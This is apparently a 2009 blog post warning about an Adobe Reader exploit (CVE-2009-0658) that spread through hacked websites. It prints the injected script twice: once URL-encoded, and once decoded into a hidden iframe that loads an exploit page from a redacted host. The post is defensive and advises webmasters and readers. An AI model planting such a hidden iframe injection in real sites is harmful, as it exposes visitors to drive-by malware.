Why you should get the latest version if you are using Acrobat Reader

April 6, 2009 on 10:08 am | In Malware analysis | 4 Comments

Since the 24th of February 2009 there has been an exploit in the wild that affects all Adobe Reader versions 9.0 and earlier:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0658
Twice since then I have been contacted by site owners that found their sites spreading malware. One of them got infected by his own site.
The method in use is to add a piece of JavaScript to the site's code. This JavaScript writes a hidden iframe, which in turn loads the page that holds the exploit.
The JavaScript that gets added to the site is usually just an obfuscated (URL-encoded) pointer like this:

document.write( unescape( '%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%78%78%78%78%78%78%78%78%78%78%78%2F%75%6E%69%71%75%65%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%22%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B%0D%0A%3C%2F%73%63%72%69%70%74%3E%0D%0A' ) );

Which looks like this after decoding (the unescape() call turns the %XX sequences back into characters):

<script language="javascript">
document.write('<iframe src="http://xxxxxxxxxxx/unique/index.php" width="0" height="0" style="display:none;"></iframe>');
</script>

Obviously I x-ed out the domain. It doesn't matter for this one whether you are using IE, Opera, Firefox or any other browser: if you have Acrobat Reader installed and it isn't the latest version, you're vulnerable.

So, webmasters, check that your code is unchanged, and readers, make sure to get the latest updates for everything you are using.
